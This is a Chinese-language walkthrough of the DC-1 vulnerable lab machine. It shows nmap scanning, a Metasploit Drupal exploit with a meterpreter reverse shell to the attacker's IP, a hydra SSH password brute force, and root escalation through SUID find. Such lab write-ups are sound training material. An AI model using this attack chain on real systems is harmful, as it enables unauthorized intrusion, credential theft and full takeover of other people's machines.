DC-1靶机网盘链接:https://pan.baidu.com/s/1kfbn4SWCLY66n0d0-VOfRA
提取码:lwoi
1、查看kali所属网段,靶机也要和kali所属在同一网段下,本人设置的是nat连接模式
查看以下DC-1的mac地址
kali使用nmap扫描全网段,这个IP地址的mac地址和DC-1的MAC地址一样,说明DC-1的ip地址就为192.168.72.166
nmap -sP 192.168.72.0/24
解释:
-sP #只进行主机发现扫描(ping扫描),不执行端口扫描
对该ip地址进行详细的扫描,查看该靶机开放了哪些端口、提供了哪些服务
nmap -A -p- 192.168.72.166
解释:
-A #开启全面扫描模式
-p- #扫描目标主机的所有端口
发现该靶机开放了22(ssh)端口和80(http)端口以及111和39935端口
2、使用该ip地址访问一下网页,从网页显示内容来看猜测是用Drupal框架来写的网页
3、kali使用msfconsole工具搜索有没有drupal框架的相关漏洞
4、使用编号为1的漏洞
1.set payload php/meterpreter/reverse_tcp #设置php反弹shell
2.set RHOSTS 192.168.72.166 #设置被攻击的主机
3.set LHOST 192.168.72.134 #设置攻击成功以后返回的会话给哪个ip
4.exploit #启动攻击
5、进去后查看一下有哪些文件可以利用的,发现一个flag1.txt,查看一下,但很遗憾没有可用的信息
6、在会话端输入shell
进入目标主机的shell界面
7、利用python在当前终端中创建一个交互式的bash shell
python -c "import pty;pty.spawn('/bin/bash')"
8、查看一下etc目录下的passwd文档,发现有一个flag4的用户
9、进入/home/flag4用户的家目录下查看一下有没有什么可用的信息,在该目录下有一个flag4.txt文件,但cat查看了一下,没有什么可用的信息。
10、在kali上重新打开一个新的终端,尝试爆破一下flag4用户的密码
hydra -l flag4 -P top1000.txt ssh://192.168.72.166
解释:
hydra #一个工具的名字
-l #hydra的选项之一,指定要尝试的用户名
-P #hydra的选项之一,指定要尝试的密码文件
ssh #表示通过ssh协议进行爆破
爆破出来的密码为orange
11、利用ssh协议登录目标靶机,然后输入密码为orange
ssh flag4@192.168.72.166
12、查找一下具有设置了SUID权限的文件
find / -perm -u=s -type f
解释:
/ #表示根目录
-perm #表示匹配指定的文件权限
-u=s #匹配具有设置了SUID权限的文件
-type f #只匹配常规文件
当一个可执行文件具有SUID权限时,它在执行时将使用文件所有者的权限来运行,而不是执行它的用户的权限
13、将/bin目录下的所有文件作为参数,并使用/bin/sh作为每个文件的执行命令
find /bin -exec "/bin/sh" \;
解释:
/bin #在/bin目录下开始查找
-exec #执行后面跟的命令
输入上述命令后,可以发现当前的权限已经变成了root用户的权限,这就表示提权成功
14、进入root用户的家目录,得到最后的flag。